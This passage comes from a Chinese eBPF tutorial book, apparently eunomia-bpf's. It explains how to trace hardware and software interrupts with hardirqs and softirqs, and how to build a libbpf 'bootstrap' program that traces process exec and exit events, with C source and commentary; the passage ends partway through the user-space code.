<p>更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档:<a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a></p>
|
||
<p>如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 以获取更多示例和完整的教程。</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf-入门开发实践教程十在-ebpf-中使用-hardirqs-或-softirqs-捕获中断事件"><a class="header" href="#ebpf-入门开发实践教程十在-ebpf-中使用-hardirqs-或-softirqs-捕获中断事件">eBPF 入门开发实践教程十:在 eBPF 中使用 hardirqs 或 softirqs 捕获中断事件</a></h1>
|
||
<p>eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。</p>
|
||
<p>本文是 eBPF 入门开发实践教程的第十篇,在 eBPF 中使用 hardirqs 或 softirqs 捕获中断事件。
|
||
hardirqs 和 softirqs 是 Linux 内核中两种不同类型的中断处理程序。它们用于处理硬件设备产生的中断请求,以及内核中的异步事件。在 eBPF 中,我们可以使用同名的 eBPF 工具 hardirqs 和 softirqs 来捕获和分析内核中与中断处理相关的信息。</p>
|
||
<h2 id="hardirqs-和-softirqs-是什么"><a class="header" href="#hardirqs-和-softirqs-是什么">hardirqs 和 softirqs 是什么?</a></h2>
|
||
<p>hardirqs 是硬件中断处理程序。当硬件设备产生一个中断请求时,内核会将该请求映射到一个特定的中断向量,然后执行与之关联的硬件中断处理程序。硬件中断处理程序通常用于处理设备驱动程序中的事件,例如设备数据传输完成或设备错误。</p>
|
||
<p>softirqs 是软件中断处理程序。它们是内核中的一种底层异步事件处理机制,用于处理内核中的高优先级任务。softirqs 通常用于处理网络协议栈、磁盘子系统和其他内核组件中的事件。与硬件中断处理程序相比,软件中断处理程序具有更高的灵活性和可配置性。</p>
|
||
<h2 id="实现原理"><a class="header" href="#实现原理">实现原理</a></h2>
|
||
<p>在 eBPF 中,我们可以通过挂载特定的 kprobe 或者 tracepoint 来捕获和分析 hardirqs 和 softirqs。为了捕获 hardirqs 和 softirqs,需要在相关的内核跟踪点上挂载 eBPF 程序。这些跟踪点包括:</p>
|
||
<ul>
|
||
<li>对于 hardirqs:irq_handler_entry 和 irq_handler_exit。</li>
|
||
<li>对于 softirqs:softirq_entry 和 softirq_exit。</li>
|
||
</ul>
|
||
<p>当内核处理 hardirqs 或 softirqs 时,这些 eBPF 程序会被执行,从而收集相关信息,如中断向量、中断处理程序的执行时间等。收集到的信息可以用于分析内核中的性能问题和其他与中断处理相关的问题。</p>
|
||
<p>为了捕获 hardirqs 和 softirqs,可以遵循以下步骤:</p>
|
||
<ol>
|
||
<li>在 eBPF 程序中定义用于存储中断信息的数据结构和映射。</li>
|
||
<li>编写 eBPF 程序,将其挂载到相应的内核函数上,以捕获 hardirqs 或 softirqs。</li>
|
||
<li>在 eBPF 程序中,收集中断处理程序的相关信息,并将这些信息存储在映射中。</li>
|
||
<li>在用户空间应用程序中,读取映射中的数据以分析和展示中断处理信息。</li>
|
||
</ol>
|
||
<p>通过上述方法,我们可以在 eBPF 中使用 hardirqs 和 softirqs 捕获和分析内核中的中断事件,以识别潜在的性能问题和与中断处理相关的问题。</p>
|
||
<h2 id="hardirqs-代码实现"><a class="header" href="#hardirqs-代码实现">hardirqs 代码实现</a></h2>
|
||
<p>hardirqs 程序的主要目的是获取中断处理程序的名称、执行次数和执行时间,并以直方图的形式展示执行时间的分布。让我们一步步分析这段代码。</p>
|
||
<pre><code class="language-c">// SPDX-License-Identifier: GPL-2.0
|
||
// Copyright (c) 2020 Wenbo Zhang
|
||
#include <vmlinux.h>
|
||
#include <bpf/bpf_core_read.h>
|
||
#include <bpf/bpf_helpers.h>
|
||
#include <bpf/bpf_tracing.h>
|
||
#include "hardirqs.h"
|
||
#include "bits.bpf.h"
|
||
#include "maps.bpf.h"
|
||
|
||
#define MAX_ENTRIES 256
|
||
|
||
const volatile bool filter_cg = false;
|
||
const volatile bool targ_dist = false;
|
||
const volatile bool targ_ns = false;
|
||
const volatile bool do_count = false;
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_CGROUP_ARRAY);
|
||
__type(key, u32);
|
||
__type(value, u32);
|
||
__uint(max_entries, 1);
|
||
} cgroup_map SEC(".maps");
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_PERCPU_ARRAY);
|
||
__uint(max_entries, 1);
|
||
__type(key, u32);
|
||
__type(value, u64);
|
||
} start SEC(".maps");
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, MAX_ENTRIES);
|
||
__type(key, struct irq_key);
|
||
__type(value, struct info);
|
||
} infos SEC(".maps");
|
||
|
||
static struct info zero;
|
||
|
||
static int handle_entry(int irq, struct irqaction *action)
|
||
{
|
||
if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0))
|
||
return 0;
|
||
|
||
if (do_count) {
|
||
struct irq_key key = {};
|
||
struct info *info;
|
||
|
||
bpf_probe_read_kernel_str(&key.name, sizeof(key.name), BPF_CORE_READ(action, name));
|
||
info = bpf_map_lookup_or_try_init(&infos, &key, &zero);
|
||
if (!info)
|
||
return 0;
|
||
info->count += 1;
|
||
return 0;
|
||
} else {
|
||
u64 ts = bpf_ktime_get_ns();
|
||
u32 key = 0;
|
||
|
||
if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0))
|
||
return 0;
|
||
|
||
bpf_map_update_elem(&start, &key, &ts, BPF_ANY);
|
||
return 0;
|
||
}
|
||
}
|
||
|
||
static int handle_exit(int irq, struct irqaction *action)
|
||
{
|
||
struct irq_key ikey = {};
|
||
struct info *info;
|
||
u32 key = 0;
|
||
u64 delta;
|
||
u64 *tsp;
|
||
|
||
if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0))
|
||
return 0;
|
||
|
||
tsp = bpf_map_lookup_elem(&start, &key);
|
||
if (!tsp)
|
||
return 0;
|
||
|
||
delta = bpf_ktime_get_ns() - *tsp;
|
||
if (!targ_ns)
|
||
delta /= 1000U;
|
||
|
||
bpf_probe_read_kernel_str(&ikey.name, sizeof(ikey.name), BPF_CORE_READ(action, name));
|
||
info = bpf_map_lookup_or_try_init(&infos, &ikey, &zero);
|
||
if (!info)
|
||
return 0;
|
||
|
||
if (!targ_dist) {
|
||
info->count += delta;
|
||
} else {
|
||
u64 slot;
|
||
|
||
slot = log2(delta);
|
||
if (slot >= MAX_SLOTS)
|
||
slot = MAX_SLOTS - 1;
|
||
info->slots[slot]++;
|
||
}
|
||
|
||
return 0;
|
||
}
|
||
|
||
SEC("tp_btf/irq_handler_entry")
|
||
int BPF_PROG(irq_handler_entry_btf, int irq, struct irqaction *action)
|
||
{
|
||
return handle_entry(irq, action);
|
||
}
|
||
|
||
SEC("tp_btf/irq_handler_exit")
|
||
int BPF_PROG(irq_handler_exit_btf, int irq, struct irqaction *action)
|
||
{
|
||
return handle_exit(irq, action);
|
||
}
|
||
|
||
SEC("raw_tp/irq_handler_entry")
|
||
int BPF_PROG(irq_handler_entry, int irq, struct irqaction *action)
|
||
{
|
||
return handle_entry(irq, action);
|
||
}
|
||
|
||
SEC("raw_tp/irq_handler_exit")
|
||
int BPF_PROG(irq_handler_exit, int irq, struct irqaction *action)
|
||
{
|
||
return handle_exit(irq, action);
|
||
}
|
||
|
||
char LICENSE[] SEC("license") = "GPL";
|
||
</code></pre>
|
||
<p>这段代码是一个 eBPF 程序,用于捕获和分析内核中硬件中断处理程序(hardirqs)的执行信息。程序的主要目的是获取中断处理程序的名称、执行次数和执行时间,并以直方图的形式展示执行时间的分布。让我们一步步分析这段代码。</p>
|
||
<ol>
|
||
<li>
|
||
<p>包含必要的头文件和定义数据结构:</p>
|
||
<pre><code class="language-c">#include <vmlinux.h>
|
||
#include <bpf/bpf_core_read.h>
|
||
#include <bpf/bpf_helpers.h>
|
||
#include <bpf/bpf_tracing.h>
|
||
#include "hardirqs.h"
|
||
#include "bits.bpf.h"
|
||
#include "maps.bpf.h"
|
||
</code></pre>
|
||
<p>该程序包含了 eBPF 开发所需的标准头文件,以及用于定义数据结构和映射的自定义头文件。</p>
|
||
</li>
|
||
<li>
|
||
<p>定义全局变量和映射:</p>
|
||
<pre><code class="language-c">
|
||
#define MAX_ENTRIES 256
|
||
|
||
const volatile bool filter_cg = false;
|
||
const volatile bool targ_dist = false;
|
||
const volatile bool targ_ns = false;
|
||
const volatile bool do_count = false;
|
||
|
||
...
|
||
</code></pre>
|
||
<p>该程序定义了一些全局变量,用于配置程序的行为。例如,<code>filter_cg</code> 控制是否过滤 cgroup,<code>targ_dist</code> 控制是否显示执行时间的分布等。此外,程序还定义了三个映射,分别用于存储 cgroup 信息、开始时间戳和中断处理程序的信息。</p>
|
||
</li>
|
||
<li>
|
||
<p>定义两个辅助函数 <code>handle_entry</code> 和 <code>handle_exit</code>:</p>
|
||
<p>这两个函数分别在中断处理程序的入口和出口处被调用。<code>handle_entry</code> 记录开始时间戳或更新中断计数,<code>handle_exit</code> 计算中断处理程序的执行时间,并将结果存储到相应的信息映射中。</p>
|
||
</li>
|
||
<li>
|
||
<p>定义 eBPF 程序的入口点:</p>
|
||
<pre><code class="language-c">
|
||
SEC("tp_btf/irq_handler_entry")
|
||
int BPF_PROG(irq_handler_entry_btf, int irq, struct irqaction *action)
|
||
{
|
||
return handle_entry(irq, action);
|
||
}
|
||
|
||
SEC("tp_btf/irq_handler_exit")
|
||
int BPF_PROG(irq_handler_exit_btf, int irq, struct irqaction *action)
|
||
{
|
||
return handle_exit(irq, action);
|
||
}
|
||
|
||
SEC("raw_tp/irq_handler_entry")
|
||
int BPF_PROG(irq_handler_entry, int irq, struct irqaction *action)
|
||
{
|
||
return handle_entry(irq, action);
|
||
}
|
||
|
||
SEC("raw_tp/irq_handler_exit")
|
||
int BPF_PROG(irq_handler_exit, int irq, struct irqaction *action)
|
||
{
|
||
return handle_exit(irq, action);
|
||
}
|
||
</code></pre>
|
||
<p>这里定义了四个 eBPF 程序入口点,分别用于捕获中断处理程序的入口和出口事件。<code>tp_btf</code> 和 <code>raw_tp</code> 分别代表使用 BPF Type Format(BTF)和原始 tracepoints 捕获事件。这样可以确保程序在不同内核版本上可以移植和运行。</p>
|
||
</li>
|
||
</ol>
|
||
<p>Softirq 代码也类似,这里就不再赘述了。</p>
|
||
<h2 id="运行代码"><a class="header" href="#运行代码">运行代码</a></h2>
|
||
<p>eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 <a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a> 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。</p>
|
||
<p>要编译这个程序,请使用 ecc 工具:</p>
|
||
<pre><code class="language-console">$ ecc hardirqs.bpf.c
|
||
Compiling bpf object...
|
||
Packing ebpf object and config into package.json...
|
||
</code></pre>
|
||
<p>然后运行:</p>
|
||
<pre><code class="language-console">sudo ecli run ./package.json
|
||
</code></pre>
|
||
<h2 id="总结-9"><a class="header" href="#总结-9">总结</a></h2>
|
||
<p>在本章节(eBPF 入门开发实践教程十:在 eBPF 中使用 hardirqs 或 softirqs 捕获中断事件)中,我们学习了如何使用 eBPF 程序捕获和分析内核中硬件中断处理程序(hardirqs)的执行信息。我们详细讲解了示例代码,包括如何定义数据结构、映射以及 eBPF 程序入口点,以及如何在中断处理程序的入口和出口处调用辅助函数来记录执行信息。</p>
|
||
<p>通过学习本章节内容,您应该已经掌握了如何在 eBPF 中使用 hardirqs 或 softirqs 捕获中断事件的方法,以及如何分析这些事件以识别内核中的性能问题和其他与中断处理相关的问题。这些技能对于分析和优化 Linux 内核的性能至关重要。</p>
|
||
<p>为了更好地理解和实践 eBPF 编程,我们建议您阅读 eunomia-bpf 的官方文档:<a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a> 。此外,我们还为您提供了完整的教程和源代码,您可以在 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 中查看和学习。希望本教程能够帮助您顺利入门 eBPF 开发,并为您的进一步学习和实践提供有益的参考。</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf-入门开发实践教程十一在-ebpf-中使用-libbpf-开发用户态程序并跟踪-exec-和-exit-系统调用"><a class="header" href="#ebpf-入门开发实践教程十一在-ebpf-中使用-libbpf-开发用户态程序并跟踪-exec-和-exit-系统调用">eBPF 入门开发实践教程十一:在 eBPF 中使用 libbpf 开发用户态程序并跟踪 exec() 和 exit() 系统调用</a></h1>
|
||
<p>eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。</p>
|
||
<p>在本教程中,我们将了解内核态和用户态的 eBPF 程序是如何协同工作的。我们还将学习如何使用原生的 libbpf 开发用户态程序,将 eBPF 应用打包为可执行文件,实现跨内核版本分发。</p>
|
||
<h2 id="libbpf-库以及为什么需要使用它"><a class="header" href="#libbpf-库以及为什么需要使用它">libbpf 库,以及为什么需要使用它</a></h2>
|
||
<p>libbpf 是一个 C 语言库,伴随内核版本分发,用于辅助 eBPF 程序的加载和运行。它提供了用于与 eBPF 系统交互的一组 C API,使开发者能够更轻松地编写用户态程序来加载和管理 eBPF 程序。这些用户态程序通常用于分析、监控或优化系统性能。</p>
|
||
<p>使用 libbpf 库有以下优势:</p>
|
||
<ul>
|
||
<li>它简化了 eBPF 程序的加载、更新和运行过程。</li>
|
||
<li>它提供了一组易于使用的 API,使开发者能够专注于编写核心逻辑,而不是处理底层细节。</li>
|
||
<li>它能够确保与内核中的 eBPF 子系统的兼容性,降低了维护成本。</li>
|
||
</ul>
|
||
<p>同时,libbpf 和 BTF(BPF Type Format)都是 eBPF 生态系统的重要组成部分。它们各自在实现跨内核版本兼容方面发挥着关键作用。BTF(BPF Type Format)是一种元数据格式,用于描述 eBPF 程序中的类型信息。BTF 的主要目的是提供一种结构化的方式,以描述内核中的数据结构,以便 eBPF 程序可以更轻松地访问和操作它们。</p>
|
||
<p>BTF 在实现跨内核版本兼容方面的关键作用如下:</p>
|
||
<ul>
|
||
<li>BTF 允许 eBPF 程序访问内核数据结构的详细类型信息,而无需对特定内核版本进行硬编码。这使得 eBPF 程序可以适应不同版本的内核,从而实现跨内核版本兼容。</li>
|
||
<li>通过使用 BPF CO-RE(Compile Once, Run Everywhere)技术,eBPF 程序在编译时借助 BTF 记录对内核数据结构的访问(重定位)信息,在加载时再由 libbpf 根据目标内核的 BTF 调整这些访问,从而使同一份编译产物可以在不同内核版本上运行。</li>
|
||
</ul>
|
||
<p>结合 libbpf 和 BTF,eBPF 程序可以在各种不同版本的内核上运行,而无需为每个内核版本单独编译。这极大地提高了 eBPF 生态系统的可移植性和兼容性,降低了开发和维护的难度。</p>
|
||
<h2 id="什么是-bootstrap"><a class="header" href="#什么是-bootstrap">什么是 bootstrap</a></h2>
|
||
<p>Bootstrap 是一个使用 libbpf 的完整应用,它利用 eBPF 程序来跟踪内核中的 exec() 系统调用(通过 SEC("tp/sched/sched_process_exec") handle_exec BPF 程序),这主要对应于新进程的创建(不包括 fork() 部分)。此外,它还跟踪进程的 exit() 系统调用(通过 SEC("tp/sched/sched_process_exit") handle_exit BPF 程序),以了解每个进程何时退出。</p>
|
||
<p>这两个 BPF 程序共同工作,允许捕获关于新进程的有趣信息,例如二进制文件的文件名,以及测量进程的生命周期,并在进程结束时收集有趣的统计信息,例如退出代码或消耗的资源量等。这是深入了解内核内部并观察事物如何真正运作的良好起点。</p>
|
||
<p>Bootstrap 还使用 argp API(libc 的一部分)进行命令行参数解析,使得用户可以通过命令行选项配置应用行为。这种方式提供了灵活性,让用户能够根据实际需求自定义程序行为。虽然这些功能使用 eunomia-bpf 工具也可以实现,但是这里我们使用 libbpf 可以在用户态提供更高的可扩展性,不过也带来了不少额外的复杂度。</p>
|
||
<h2 id="bootstrap"><a class="header" href="#bootstrap">Bootstrap</a></h2>
|
||
<p>Bootstrap 分为两个部分:内核态和用户态。内核态部分是一个 eBPF 程序,它跟踪 exec() 和 exit() 系统调用。用户态部分是一个 C 语言程序,它使用 libbpf 库来加载和运行内核态程序,并处理从内核态程序收集的数据。</p>
|
||
<h3 id="内核态-ebpf-程序-bootstrapbpfc"><a class="header" href="#内核态-ebpf-程序-bootstrapbpfc">内核态 eBPF 程序 bootstrap.bpf.c</a></h3>
|
||
<pre><code class="language-c">// SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause
|
||
/* Copyright (c) 2020 Facebook */
|
||
#include "vmlinux.h"
|
||
#include <bpf/bpf_helpers.h>
|
||
#include <bpf/bpf_tracing.h>
|
||
#include <bpf/bpf_core_read.h>
|
||
#include "bootstrap.h"
|
||
|
||
char LICENSE[] SEC("license") = "Dual BSD/GPL";
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, 8192);
|
||
__type(key, pid_t);
|
||
__type(value, u64);
|
||
} exec_start SEC(".maps");
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_RINGBUF);
|
||
__uint(max_entries, 256 * 1024);
|
||
} rb SEC(".maps");
|
||
|
||
const volatile unsigned long long min_duration_ns = 0;
|
||
|
||
SEC("tp/sched/sched_process_exec")
|
||
int handle_exec(struct trace_event_raw_sched_process_exec *ctx)
|
||
{
|
||
struct task_struct *task;
|
||
unsigned fname_off;
|
||
struct event *e;
|
||
pid_t pid;
|
||
u64 ts;
|
||
|
||
/* remember time exec() was executed for this PID */
|
||
pid = bpf_get_current_pid_tgid() >> 32;
|
||
ts = bpf_ktime_get_ns();
|
||
bpf_map_update_elem(&exec_start, &pid, &ts, BPF_ANY);
|
||
|
||
/* don't emit exec events when minimum duration is specified */
|
||
if (min_duration_ns)
|
||
return 0;
|
||
|
||
/* reserve sample from BPF ringbuf */
|
||
e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0);
|
||
if (!e)
|
||
return 0;
|
||
|
||
/* fill out the sample with data */
|
||
task = (struct task_struct *)bpf_get_current_task();
|
||
|
||
e->exit_event = false;
|
||
e->pid = pid;
|
||
e->ppid = BPF_CORE_READ(task, real_parent, tgid);
|
||
bpf_get_current_comm(&e->comm, sizeof(e->comm));
|
||
|
||
fname_off = ctx->__data_loc_filename & 0xFFFF;
|
||
bpf_probe_read_str(&e->filename, sizeof(e->filename), (void *)ctx + fname_off);
|
||
|
||
/* successfully submit it to user-space for post-processing */
|
||
bpf_ringbuf_submit(e, 0);
|
||
return 0;
|
||
}
|
||
|
||
SEC("tp/sched/sched_process_exit")
|
||
int handle_exit(struct trace_event_raw_sched_process_template* ctx)
|
||
{
|
||
struct task_struct *task;
|
||
struct event *e;
|
||
pid_t pid, tid;
|
||
u64 id, ts, *start_ts, duration_ns = 0;
|
||
|
||
/* get PID and TID of exiting thread/process */
|
||
id = bpf_get_current_pid_tgid();
|
||
pid = id >> 32;
|
||
tid = (u32)id;
|
||
|
||
/* ignore thread exits */
|
||
if (pid != tid)
|
||
return 0;
|
||
|
||
/* if we recorded start of the process, calculate lifetime duration */
|
||
start_ts = bpf_map_lookup_elem(&exec_start, &pid);
|
||
if (start_ts)
|
||
duration_ns = bpf_ktime_get_ns() - *start_ts;
|
||
else if (min_duration_ns)
|
||
return 0;
|
||
bpf_map_delete_elem(&exec_start, &pid);
|
||
|
||
/* if process didn't live long enough, return early */
|
||
if (min_duration_ns && duration_ns < min_duration_ns)
|
||
return 0;
|
||
|
||
/* reserve sample from BPF ringbuf */
|
||
e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0);
|
||
if (!e)
|
||
return 0;
|
||
|
||
/* fill out the sample with data */
|
||
task = (struct task_struct *)bpf_get_current_task();
|
||
|
||
e->exit_event = true;
|
||
e->duration_ns = duration_ns;
|
||
e->pid = pid;
|
||
e->ppid = BPF_CORE_READ(task, real_parent, tgid);
|
||
e->exit_code = (BPF_CORE_READ(task, exit_code) >> 8) & 0xff;
|
||
bpf_get_current_comm(&e->comm, sizeof(e->comm));
|
||
|
||
/* send data to user-space for post-processing */
|
||
bpf_ringbuf_submit(e, 0);
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>这段代码是一个内核态 eBPF 程序(bootstrap.bpf.c),主要用于跟踪 exec() 和 exit() 系统调用。它通过 eBPF 程序捕获进程的创建和退出事件,并将相关信息发送到用户态程序进行处理。下面是对代码的详细解释。</p>
|
||
<p>首先,我们引入所需的头文件,定义 eBPF 程序的许可证以及两个 eBPF maps:exec_start 和 rb。exec_start 是一个哈希类型的 eBPF map,用于存储进程开始执行时的时间戳。rb 是一个环形缓冲区类型的 eBPF map,用于存储捕获的事件数据,并将其发送到用户态程序。</p>
|
||
<pre><code class="language-c">#include "vmlinux.h"
|
||
#include <bpf/bpf_helpers.h>
|
||
#include <bpf/bpf_tracing.h>
|
||
#include <bpf/bpf_core_read.h>
|
||
#include "bootstrap.h"
|
||
|
||
char LICENSE[] SEC("license") = "Dual BSD/GPL";
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, 8192);
|
||
__type(key, pid_t);
|
||
__type(value, u64);
|
||
} exec_start SEC(".maps");
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_RINGBUF);
|
||
__uint(max_entries, 256 * 1024);
|
||
} rb SEC(".maps");
|
||
|
||
const volatile unsigned long long min_duration_ns = 0;
|
||
</code></pre>
|
||
<p>接下来,我们定义了一个名为 handle_exec 的 eBPF 程序,它会在进程执行 exec() 系统调用时触发。首先,我们从当前进程中获取 PID,记录进程开始执行的时间戳,然后将其存储在 exec_start map 中。</p>
|
||
<pre><code class="language-c">SEC("tp/sched/sched_process_exec")
|
||
int handle_exec(struct trace_event_raw_sched_process_exec *ctx)
|
||
{
|
||
// ...
|
||
pid = bpf_get_current_pid_tgid() >> 32;
|
||
ts = bpf_ktime_get_ns();
|
||
bpf_map_update_elem(&exec_start, &pid, &ts, BPF_ANY);
|
||
|
||
// ...
|
||
}
|
||
</code></pre>
|
||
<p>然后,我们从环形缓冲区 map rb 中预留一个事件结构,并填充相关数据,如进程 ID、父进程 ID、进程名等。之后,我们将这些数据发送到用户态程序进行处理。</p>
|
||
<pre><code class="language-c"> // reserve sample from BPF ringbuf
|
||
e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0);
|
||
if (!e)
|
||
return 0;
|
||
|
||
// fill out the sample with data
|
||
task = (struct task_struct *)bpf_get_current_task();
|
||
|
||
e->exit_event = false;
|
||
e->pid = pid;
|
||
e->ppid = BPF_CORE_READ(task, real_parent, tgid);
|
||
bpf_get_current_comm(&e->comm, sizeof(e->comm));
|
||
|
||
fname_off = ctx->__data_loc_filename & 0xFFFF;
|
||
bpf_probe_read_str(&e->filename, sizeof(e->filename), (void *)ctx + fname_off);
|
||
|
||
// successfully submit it to user-space for post-processing
|
||
bpf_ringbuf_submit(e, 0);
|
||
return 0;
|
||
</code></pre>
|
||
<p>最后,我们定义了一个名为 handle_exit 的 eBPF 程序,它会在进程执行 exit() 系统调用时触发。首先,我们从当前进程中获取 PID 和 TID(线程 ID)。如果 PID 和 TID 不相等,说明这是一个线程退出,我们将忽略此事件。</p>
|
||
<pre><code class="language-c">SEC("tp/sched/sched_process_exit")
|
||
int handle_exit(struct trace_event_raw_sched_process_template* ctx)
|
||
{
|
||
// ...
|
||
id = bpf_get_current_pid_tgid();
|
||
pid = id >> 32;
|
||
tid = (u32)id;
|
||
|
||
/* ignore thread exits */
|
||
if (pid != tid)
|
||
return 0;
|
||
|
||
// ...
|
||
}
|
||
</code></pre>
|
||
<p>接着,我们查找之前存储在 exec_start map 中的进程开始执行的时间戳。如果找到了时间戳,我们将计算进程的生命周期(持续时间),然后从 exec_start map 中删除该记录。如果未找到时间戳且指定了最小持续时间,则直接返回。</p>
|
||
<pre><code class="language-c"> // if we recorded start of the process, calculate lifetime duration
|
||
start_ts = bpf_map_lookup_elem(&exec_start, &pid);
|
||
if (start_ts)
|
||
duration_ns = bpf_ktime_get_ns() - *start_ts;
|
||
else if (min_duration_ns)
|
||
return 0;
|
||
bpf_map_delete_elem(&exec_start, &pid);
|
||
|
||
// if process didn't live long enough, return early
|
||
if (min_duration_ns && duration_ns < min_duration_ns)
|
||
return 0;
|
||
</code></pre>
|
||
<p>然后,我们从环形缓冲区 map rb 中预留一个事件结构,并填充相关数据,如进程 ID、父进程 ID、进程名、进程持续时间等。最后,我们将这些数据发送到用户态程序进行处理。</p>
|
||
<pre><code class="language-c"> /* reserve sample from BPF ringbuf */
|
||
e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0);
|
||
if (!e)
|
||
return 0;
|
||
|
||
/* fill out the sample with data */
|
||
task = (struct task_struct *)bpf_get_current_task();
|
||
|
||
e->exit_event = true;
|
||
e->duration_ns = duration_ns;
|
||
e->pid = pid;
|
||
e->ppid = BPF_CORE_READ(task, real_parent, tgid);
|
||
e->exit_code = (BPF_CORE_READ(task, exit_code) >> 8) & 0xff;
|
||
bpf_get_current_comm(&e->comm, sizeof(e->comm));
|
||
|
||
/* send data to user-space for post-processing */
|
||
bpf_ringbuf_submit(e, 0);
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>这样,当进程执行 exec() 或 exit() 系统调用时,我们的 eBPF 程序会捕获相应的事件,并将详细信息发送到用户态程序进行后续处理。这使得我们可以轻松地监控进程的创建和退出,并获取有关进程的详细信息。</p>
|
||
<p>除此之外,在 bootstrap.h 中,我们还定义了和用户态交互的数据结构:</p>
|
||
<pre><code class="language-c">/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */
|
||
/* Copyright (c) 2020 Facebook */
|
||
#ifndef __BOOTSTRAP_H
|
||
#define __BOOTSTRAP_H
|
||
|
||
#define TASK_COMM_LEN 16
|
||
#define MAX_FILENAME_LEN 127
|
||
|
||
struct event {
|
||
int pid;
|
||
int ppid;
|
||
unsigned exit_code;
|
||
unsigned long long duration_ns;
|
||
char comm[TASK_COMM_LEN];
|
||
char filename[MAX_FILENAME_LEN];
|
||
bool exit_event;
|
||
};
|
||
|
||
#endif /* __BOOTSTRAP_H */
|
||
</code></pre>
|
||
<h3 id="用户态bootstrapc"><a class="header" href="#用户态bootstrapc">用户态,bootstrap.c</a></h3>
|
||
<pre><code class="language-c">// SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause)
|
||
/* Copyright (c) 2020 Facebook */
|
||
#include <argp.h>
|
||
#include <signal.h>
|
||
#include <stdio.h>
|
||
#include <time.h>
|
||
#include <sys/resource.h>
|
||
#include <bpf/libbpf.h>
|
||
#include "bootstrap.h"
|
||
#include "bootstrap.skel.h"
|
||
|
||
static struct env {
|
||
bool verbose;
|
||
long min_duration_ms;
|
||
} env;
|
||
|
||
const char *argp_program_version = "bootstrap 0.0";
|
||
const char *argp_program_bug_address = "<bpf@vger.kernel.org>";
|
||
const char argp_program_doc[] =
|
||
"BPF bootstrap demo application.\n"
|
||
"\n"
|
||
"It traces process start and exits and shows associated \n"
|
||
"information (filename, process duration, PID and PPID, etc).\n"
|
||
"\n"
|
||
"USAGE: ./bootstrap [-d <min-duration-ms>] [-v]\n";
|
||
|
||
static const struct argp_option opts[] = {
|
||
{ "verbose", 'v', NULL, 0, "Verbose debug output" },
|
||
{ "duration", 'd', "DURATION-MS", 0, "Minimum process duration (ms) to report" },
|
||
{},
|
||
};
|
||
|
||
static error_t parse_arg(int key, char *arg, struct argp_state *state)
|
||
{
|
||
switch (key) {
|
||
case 'v':
|
||
env.verbose = true;
|
||
break;
|
||
case 'd':
|
||
errno = 0;
|
||
env.min_duration_ms = strtol(arg, NULL, 10);
|
||
if (errno || env.min_duration_ms <= 0) {
|
||
fprintf(stderr, "Invalid duration: %s\n", arg);
|
||
argp_usage(state);
|
||
}
|
||
break;
|
||
case ARGP_KEY_ARG:
|
||
argp_usage(state);
|
||
break;
|
||
default:
|
||
return ARGP_ERR_UNKNOWN;
|
||
}
|
||
return 0;
|
||
}
|
||
|
||
static const struct argp argp = {
|
||
.options = opts,
|
||
.parser = parse_arg,
|
||
.doc = argp_program_doc,
|
||
};
|
||
|
||
static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args)
|
||
{
|
||
if (level == LIBBPF_DEBUG && !env.verbose)
|
||
return 0;
|
||
return vfprintf(stderr, format, args);
|
||
}
|
||
|
||
static volatile bool exiting = false;
|
||
|
||
static void sig_handler(int sig)
|
||
{
|
||
exiting = true;
|
||
}
|
||
|
||
static int handle_event(void *ctx, void *data, size_t data_sz)
|
||
{
|
||
const struct event *e = data;
|
||
struct tm *tm;
|
||
char ts[32];
|
||
time_t t;
|
||
|
||
time(&t);
|
||
tm = localtime(&t);
|
||
strftime(ts, sizeof(ts), "%H:%M:%S", tm);
|
||
|
||
if (e->exit_event) {
|
||
printf("%-8s %-5s %-16s %-7d %-7d [%u]",
|
||
ts, "EXIT", e->comm, e->pid, e->ppid, e->exit_code);
|
||
if (e->duration_ns)
|
||
printf(" (%llums)", e->duration_ns / 1000000);
|
||
printf("\n");
|
||
} else {
|
||
printf("%-8s %-5s %-16s %-7d %-7d %s\n",
|
||
ts, "EXEC", e->comm, e->pid, e->ppid, e->filename);
|
||
}
|
||
|
||
return 0;
|
||
}
|
